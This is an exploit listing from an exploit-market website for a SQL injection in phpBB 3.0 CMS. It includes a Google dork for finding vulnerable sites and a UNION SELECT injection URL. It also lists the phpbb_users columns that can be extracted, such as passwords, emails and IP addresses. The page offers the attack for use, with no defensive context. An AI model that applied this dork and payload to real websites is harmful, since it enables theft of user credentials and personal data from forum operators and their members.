[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHPBB 3.0.* CMS SQL Injection Vulnerability

Author
Un-Dead
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13885
Category
web applications
Date add
27-08-2010
Platform
php
===========================================
PHPBB 3.0.* CMS SQL Injection Vulnerability
===========================================

# Exploit Title: PHPBB 3.0.* CMS SQLinjection

 

# Date: 2010-08-27

 

# Team: eX.ploit ( Abjects #ex.ploit )

 

# Software Link: http://www.phpbb.com/

 

# Version: PHPBB3.0.* CMS only (does not work on FORUM only)

 

# Tested on: Linux

 

# Usage: SQLinjection

 

# Gain detailed database information

 

# Code:

 

 Google dork:[inurl:mypage.php?id= & "Powered by phpBB"]

# Tested on:linux/php 

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ BUG @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

 

Url| http://www.website.com/news_view.php?id=1

 
Vuln: http://www.website.com/news_view.php?id=1+and+1=0+ Union Select   UNHEX(HEX([visible]))  ,2,3,4

 

 

 

Returns

 

Columns: Table phpbb_users

 

                user_type

 

                group_id

 

                user_permissions

 

                user_perm_from

 

                user_ip

 

                user_regdate

 

                username

 

                username_clean

 

                user_password

 

                user_passchg

 

                user_pass_convert

 

                user_email

 

                user_email_hash

 

                user_birthday

 

                user_lastvisit

 

                user_lastmark

 

                user_lastpost_time

 

                user_lastpage

 

                user_last_confirm_key

 

                user_last_search

 

                user_warnings

 

                user_last_warning

 

                user_login_attempts

 

                user_inactive_reason

 

                user_inactive_time

 

                user_posts

 

                user_lang

 

                user_timezone

 

                user_dst

 

                user_dateformat

 

                user_style

 

                user_rank

 

                user_colour

 

                user_new_privmsg

 

                user_unread_privmsg

 

                user_last_privmsg

 

                user_message_rules

 

                user_full_folder

 

                user_emailtime

 

                user_topic_show_days

 

                user_topic_sortby_type

 

                user_topic_sortby_dir

 

                user_post_show_days

 

                user_post_sortby_type

 

                user_post_sortby_dir

 

                user_notify

 

                user_notify_pm

 

                user_notify_type

 

                user_allow_pm

 

                user_allow_viewonline

 

                user_allow_viewemail

 

                user_allow_massemail

 

                user_options

 

                user_avatar

 

                user_avatar_type

 

                user_avatar_width

 

                user_avatar_height

 

                user_sig

 

                user_sig_bbcode_uid

 

                user_sig_bbcode_bitfield

 

                user_from

 

                user_icq

 

                user_aim

 

                user_yim

 

                user_msnm

 

                user_jabber

 

                user_website

 

                user_occ

 

                user_interests

 

                user_actkey

 

                user_newpasswd

 

                user_form_salt

 

 

-------------------



#  0day.today [2024-12-24]  #